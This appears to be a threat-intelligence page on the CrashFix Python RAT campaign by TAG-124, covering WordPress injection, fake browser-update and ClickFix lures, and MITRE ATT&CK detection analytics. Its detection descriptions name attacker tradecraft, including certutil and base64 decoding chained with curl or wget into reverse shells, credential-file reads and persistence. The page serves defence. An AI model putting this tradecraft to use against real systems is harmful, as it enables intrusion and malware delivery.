
CrashFix Python RAT Campaign
Indicators of Compromise
No domains found for this campaign
APT Groups1
TAG-124 specializes in stealthy malware distribution without direct post-compromise activity. It compromises thousands of legitimate websites (primarily WordPress) to inject obfuscated JavaScript, which redirects qualifying visitors to fake software update pages (e.g., bogus Google Chrome updates). Techniques include frequent URL/JavaScript filename rotations, conditional logic for evasion (bypassing sandboxes/researchers), and adoption of social engineering tricks like ClickFix (prompting users to paste/run malicious commands). Payloads often masquerade as legitimate updates, leading to loaders or direct malware execution. The infrastructure includes compromised sites, actor-controlled servers, central management panels, and payload hosts. Indicators of Attack (IoA) Injection of malicious/obfuscated JavaScript into compromised WordPress sites (e.g., files like metrics.js, hpms1989.js). Redirects to fake update domains (e.g., update-chronne[.]com/Release.zip). Use of ClickFix social engineering (fake dialogs prompting clipboard execution). Payloads including MintsLoader, REMCOS RAT, or ransomware precursors. Traffic filtering based on referer (often misspelled in code), user-agent, or IP. High-volume compromises of legitimate sites via SEO poisoning or direct breaches.
Campaign Guidance
Remediation, mitigation, notes, history and related intelligence
REMEDIATION
T1053.005 - Scheduled Task
ID | Name | Analytic ID | Analytic Description |
Detection of Suspicious Scheduled Task Creation and Execution on Windows | Detects the creation, modification, or deletion of scheduled tasks through Task Scheduler, WMI, PowerShell, or API-based methods followed by execution from svchost.exe or taskeng.exe. Includes detection of hidden or anomalous scheduled tasks, especially those created under SYSTEM or suspicious user contexts. |
T1033 - System Owner/User Discovery
ID | Name | Analytic ID | Analytic Description |
Behavioral Detection of User Discovery via Local and Remote Enumeration | Adversary launches built-in system tools (e.g., whoami, query user, net user) or scripts that enumerate user account information via local execution or remote API queries (e.g., WMI, PowerShell). | ||
Adversary runs commands like whoami, id, w, or cat /etc/passwd from non-interactive or scripting contexts to enumerate system user details. | |||
Adversary uses dscl, who, or environment variables like $USER to identify accounts or sessions via Terminal or malicious LaunchAgents. | |||
Adversary executes CLI commands like show users, show ssh, or attempts to dump AAA user lists from routers or switches. |
T1082 - System Information Discovery
ID | Name | Analytic ID | Analytic Description |
Process creation and command-line execution of native system discovery utilities such as systeminfo, hostname, wmic, or use of PowerShell/WMI for system enumeration. | |||
Execution of system enumeration commands such as uname, df, uptime, hostname, lscpu, and cat /etc/os-release through local terminal or scripts. | |||
Execution of system info utilities like systemsetup, sw_vers, uname, or sysctl by terminal or scripted processes. | |||
Execution of esxcli system hostname get, esxcli system version get, or esxcli hardware commands through SSH or local shell. | |||
Use of cloud API calls (e.g., AWS EC2 DescribeInstances, Azure VM Inventory) to enumerate system configurations across assets. | |||
Execution of show version, show hardware, or show system commands through CLI via SSH or console. |
T1140 - Deobfuscate/Decode Files or Information
ID | Name | Analytic ID | Analytic Description |
Detect Adversary Deobfuscation or Decoding of Files and Payloads | An adversary leverages built-in tools such as certutil.exe, powershell.exe, or copy.exe to decode, reassemble, or extract hidden malicious content from obfuscated containers or encoded formats. The decoding utility often spawns shortly after file staging or download and may be chained with script interpreters or further payload execution. | ||
The adversary uses native utilities like base64, gzip, tar, or openssl to decode, decompress, or decrypt files that were previously staged or downloaded. These tools may be chained with curl/wget and executed via bash/zsh, often to extract an embedded payload or reverse shell script. | |||
The adversary invokes built-in scripting or decoding tools like base64, plutil, or AppleScript-based utilities to decode files embedded in staging artifacts. Decoding often occurs post-download or as part of post-exploitation payload deployment via zsh, python, or osascript. |
T1016 - System Network Configuration Discovery
ID | Name | Analytic ID | Analytic Description |
Behavioral Detection of System Network Configuration Discovery | Execution of built-in tools (e.g., ipconfig, route, netsh) or PowerShell/WMI queries to enumerate IP, MAC, interface status, or routing configuration. | ||
Execution of ifconfig, ip a, or access to /proc/net/ indicating collection of local interface and route configuration. | |||
Execution of ifconfig, networksetup, or system_profiler to query IP/MAC/interface configuration and status. | |||
Use of esxcli network commands (e.g., esxcli network nic list, esxcli network ip interface ipv4 get) via SSH or hostd to enumerate adapter and IP information. | |||
CLI-based execution of interface and routing discovery commands (e.g., show ip interface, show arp, show route) over Telnet, SSH, or console. |
T1036.004 - Masquerade Task or Service
ID | Name | Analytic ID | Analytic Description |
Detection of Masqueraded Tasks or Services with Suspicious Naming and Execution | Creation or modification of Windows services or scheduled tasks with names or descriptions mimicking legitimate entries, followed by anomalous execution of untrusted binaries or LOLBAS. | ||
Creation or modification of systemd service units or cron jobs using deceptive naming and untrusted command paths, often followed by lateral network activity or privilege escalation. | |||
Creation of LaunchAgents or LaunchDaemons with names resembling known system services but executing non-Apple signed code or scripts. |
T1049 - System Network Connections Discovery
ID | Name | Analytic ID | Analytic Description |
Detection of System Network Connections Discovery Across Platforms | Detects usage of commands or binaries (e.g., netstat, PowerShell Get-NetTCPConnection) and WMI or API calls to enumerate local or remote network connections. | ||
Detects use of netstat, ss, lsof, or custom shell scripts to list current network connections. Often paired with privilege escalation or staging. | |||
Detects shell-based enumeration of active connections using netstat, lsof -i, or AppleScript-based system discovery. | |||
Detects shell or API usage of esxcli network ip connection list or netstat to enumerate ESXi host connections. | |||
Detects interactive or automated use of CLI commands like show ip sockets, show tcp brief, or SNMP queries for active sessions on routers/switches. | |||
Detects enumeration of cloud network interfaces, VPCs, subnets, or peer connections using CLI or SDKs (e.g., AWS CLI, Azure CLI, GCloud CLI). |
T1204 - User Execution
ID | Name | Analytic ID | Analytic Description |
Cause→effect chain: (1) User-facing app (Office/PDF/archiver/browser) records an open/click or abnormal event, then (2) a downloaded file is created in a user-writable path and/or decompressed, (3) the parent user app spawns a living-off-the-land binary (e.g., powershell/cmd/mshta/rundll32/msiexec/wscript/expand/zip) or installer, and (4) immediate outbound HTTP(S)/DNS/SMB from the same lineage. | |||
Cause→effect chain: (1) User app/browser/archiver logs an open/click or abnormal exit, (2) new executable/script/archive extracted into $HOME/Downloads, /tmp, or ~/.cache, (3) parent app spawns shell/interpreter (bash/sh/python/node/curl/wget) or desktop file, and (4) new outbound connection(s) from the child lineage. | |||
Cause→effect chain: (1) unified logs show application open/click or crash for Safari/Chrome/Office/Preview/archiver, (2) file write/extraction into ~/Downloads, /private/var/folders/* or ~/Library, (3) parent app spawns osascript/bash/zsh/curl/python or opens a quarantined app with Gatekeeper prompts, (4) network egress from child. | |||
Cause→effect chain in CI/dev desktops: (1) user triggers container run/pull after opening a doc/link/script, (2) newly created image/container uses unexpected external registry or entrypoint, (3) container starts and immediately egresses to suspicious destinations. | |||
Cause→effect chain in cloud consoles: (1) user clicks link then invokes instance/image creation via API, (2) instance/image originates from external AMI or unknown image, (3) instance immediately egresses or retrieves payloads. |
T1057 - Process Discovery
ID | Name | Analytic ID | Analytic Description |
Identifies adversary behavior that launches commands or invokes APIs to enumerate active processes (e.g., tasklist.exe, Get-Process, or CreateToolhelp32Snapshot). Detects execution combined with parent process lineage, network session context, or remote origin. | |||
Detects execution of common process enumeration utilities (e.g., ps, top, htop) or access to /proc with suspicious ancestry. Correlates command usage with interactive shell context and user role. | |||
Monitors execution of ps, top, or launchctl with unusual parent processes or from terminal scripts. Also detects AppleScript-based process listing or system_profiler SPApplicationsDataType misuse. | |||
Detects process enumeration using esxcli system process list or ps on ESXi shell or via unauthorized SSH sessions. Correlates with interactive sessions and abnormal user roles. | |||
Monitors CLI-based execution of show process or equivalent on routers/switches. Correlates unusual device access, unauthorized roles, or config mode changes. |
T1059.001 - PowerShell
ID | Name | Analytic ID | Analytic Description |
Detects behavioral chains where PowerShell is launched with encoded commands, unusual parent processes, or suspicious modules loaded, potentially followed by network connections or child process spawning. Supports detection of both direct (powershell.exe) and indirect (.NET automation) invocations. |
T1547.001 - Registry Run Keys / Startup Folder
ID | Name | Analytic ID | Analytic Description |
Correlation of Registry key creation/modification events under known Run/Startup keys with new or unusual binary paths or script-based payloads. Multi-event detection includes registry modification followed by process execution from non-standard directories or abnormal parent-child process relationships. |
T1027 - Obfuscated Files or Information
ID | Name | Analytic ID | Analytic Description |
Correlates script execution or suspicious parent processes with creation or modification of encoded, compressed, or encrypted file formats (e.g., .zip, .7z, .enc) and abnormal command-line syntax or PowerShell obfuscation. | |||
Detects use of gzip, base64, tar, or openssl in scripts or commands that encode/encrypt files after file staging or system enumeration. | |||
Monitors use of archive or encryption tools (zip, openssl) tied to user-scripted activity or binaries writing encoded payloads under /Users or /Volumes. | |||
Identifies transfer of base64, uuencoded, or high-entropy files over HTTP, FTP, or custom protocols in lateral movement or exfiltration streams. | |||
Detects encoded PowerCLI or Base64-encoded payloads staged via datastore uploads or shell access (e.g., ESXi Shell or backdoored VIBs). |
T1518.001 - Security Software Discovery
ID | Name | Analytic ID | Analytic Description |
Adversary executes commands to enumerate installed antivirus, EDR, or firewall agents using WMI, registry queries, and built-in tools (e.g., tasklist, netsh, sc query). Correlated with elevated process privileges or scripting engine usage. | |||
Adversary runs discovery commands such as ps aux, systemctl status, or cat /etc/init.d/ to enumerate security software or services. Often occurs alongside privilege escalation or bash script execution. | |||
Adversary attempts to detect monitoring agents such as Little Snitch, KnockKnock, or other system daemons via process listing (ps -e), application folder checks, and system extension listing. |
T1059.006 - Python
ID | Name | Analytic ID | Analytic Description |
Detects Python execution via python.exe or py.exe with anomalous parent lineage (e.g., Office macros, LOLBAS), execution from unusual directories, or chained network/PowerShell/system-level activity. | |||
Detects native Python or framework-based execution from Terminal, embedded apps, or launchd jobs. Flags network calls, persistence writes, or system enumeration after Python launch. | |||
Detects Python execution from non-standard user contexts or cron jobs that invoke outbound traffic, access sensitive files, or perform process injection (e.g., ptrace or /proc memory maps). | |||
Detects Python script or interpreter execution on ESXi hosts via embedded BusyBox shells, nested installations, or dropped files via SSH or datastore mount. Flags unusual scripting or post-compromise enumeration behavior. |
T1071.001 - Web Protocols
ID | Name | Analytic ID | Analytic Description |
Detection of Web Protocol-Based C2 Over HTTP, HTTPS, or WebSockets | Detects unexpected or high-volume HTTP/S/WebSocket communication from suspicious processes (e.g., PowerShell, rundll32) using uncommon user agents or mimicking browser traffic to unusual domains or IPs. | ||
Detects curl, wget, Python requests, or custom HTTP clients communicating over non-standard ports, with repetitive or beacon-like patterns or POST-heavy behavior to rare domains. | |||
Detects applications such as Automator, AppleScript, or LaunchDaemons invoking HTTP/S traffic to non-standard domains or using suspicious headers (e.g., Base64 in URIs or cookie fields). | |||
Detects HTTP or HTTPS communication initiated by shell-based scripts or management daemons, especially those reaching public IPs over ports 80/443 using embedded curl or wget. | |||
Detects Web protocol misuse such as encoded HTTP headers, WebSocket upgrade requests with abnormal payloads, or TLS handshake anomalies suggesting embedded C2 channels. |
T1105 - Ingress Tool Transfer
ID | Name | Analytic ID | Analytic Description |
Unusual or uncommon processes initiate network connections to external destinations followed by file creation (tools downloaded). | |||
Shell-based tools (curl, wget, scp) initiate connections to external domains followed by creation of executable files on disk. | |||
Process execution of curl or wget followed by a network connection and a file created in temporary or user-specific directories. | |||
Command line interface or vCLI triggers remote transfer using wget or curl, writing files into datastore paths or local tmp directories. | |||
Network device logs show anomalous inbound file transfers or uncharacteristic flows with high payload volume to network devices with storage or automation hooks. |